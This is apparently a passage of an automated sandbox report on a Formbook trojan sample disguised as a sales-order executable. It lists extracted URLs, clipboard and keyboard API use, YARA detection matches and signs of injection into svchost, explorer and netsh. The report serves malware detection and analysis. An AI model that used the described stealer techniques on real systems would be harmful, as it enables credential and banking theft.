          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000000.1848448919.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003FEAFF
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003FED6A
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003FEAFF
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_003EAA57
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_00419576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00419576

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4140986795.000000000E678000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: Process Memory Space: SALES ORDER875.exe PID: 6380, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 5228, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: netsh.exe PID: 7032, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: SALES ORDER875.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: SALES ORDER875.exe, 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6a5829fb-b
          Source: SALES ORDER875.exe, 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_707b4d2b-4
          Source: SALES ORDER875.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0bccb60c-9
          Source: SALES ORDER875.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_30d91295-4
          Source: initial sampleStatic PE information: Filename: SALES ORDER875.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B60 NtClose,LdrInitializeThunk,1_2_03272B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BF0 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_03272BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AD0 NtReadFile,LdrInitializeThunk,1_2_03272AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F30 NtCreateSection,LdrInitializeThunk,1_2_03272F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FB0 NtResumeThread,LdrInitializeThunk,1_2_03272FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F90 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03272F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FE0 NtCreateFile,LdrInitializeThunk,1_2_03272FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_03272EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E80 NtReadVirtualMemory,LdrInitializeThunk,1_2_03272E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D30 NtUnmapViewOfSection,LdrInitializeThunk,1_2_03272D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D10 NtMapViewOfSection,LdrInitializeThunk,1_2_03272D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03272DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DD0 NtDelayExecution,LdrInitializeThunk,1_2_03272DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CA0 NtQueryInformationToken,LdrInitializeThunk,1_2_03272CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274340 NtSetContextThread,1_2_03274340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274650 NtSuspendThread,1_2_03274650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BA0 NtEnumerateValueKey,1_2_03272BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B80 NtQueryInformationFile,1_2_03272B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BE0 NtQueryValueKey,1_2_03272BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AB0 NtWaitForSingleObject,1_2_03272AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AF0 NtWriteFile,1_2_03272AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F60 NtCreateProcessEx,1_2_03272F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FA0 NtQuerySection,1_2_03272FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E30 NtWriteVirtualMemory,1_2_03272E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EE0 NtQueueApcThread,1_2_03272EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D00 NtSetInformationFile,1_2_03272D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DB0 NtEnumerateKey,1_2_03272DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C00 NtQueryInformationProcess,1_2_03272C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C60 NtCreateKey,1_2_03272C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C70 NtFreeVirtualMemory,1_2_03272C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CF0 NtOpenProcess,1_2_03272CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CC0 NtQueryVirtualMemory,1_2_03272CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273010 NtOpenDirectoryObject,1_2_03273010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273090 NtSetValueKey,1_2_03273090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032735C0 NtCreateMutant,1_2_032735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032739B0 NtGetContextThread,1_2_032739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D10 NtOpenProcessToken,1_2_03273D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D70 NtOpenThread,1_2_03273D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CA320 NtCreateFile,1_2_006CA320
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CA3D0 NtReadFile,1_2_006CA3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CA450 NtClose,1_2_006CA450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CA500 NtAllocateVirtualMemory,1_2_006CA500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CA31D NtCreateFile,1_2_006CA31D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CA44A NtClose,1_2_006CA44A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,1_2_0316A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A042 NtQueryInformationProcess,1_2_0316A042
          Source: C:\Windows\explorer.exeCode function: 3_2_0E660232 NtCreateFile,3_2_0E660232
          Source: C:\Windows\explorer.exeCode function: 3_2_0E661E12 NtProtectVirtualMemory,3_2_0E661E12
          Source: C:\Windows\explorer.exeCode function: 3_2_0E661E0A NtProtectVirtualMemory,3_2_0E661E0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42AD0 NtReadFile,LdrInitializeThunk,4_2_00E42AD0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42B60 NtClose,LdrInitializeThunk,4_2_00E42B60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_00E42CA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42C60 NtCreateKey,LdrInitializeThunk,4_2_00E42C60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00E42C70
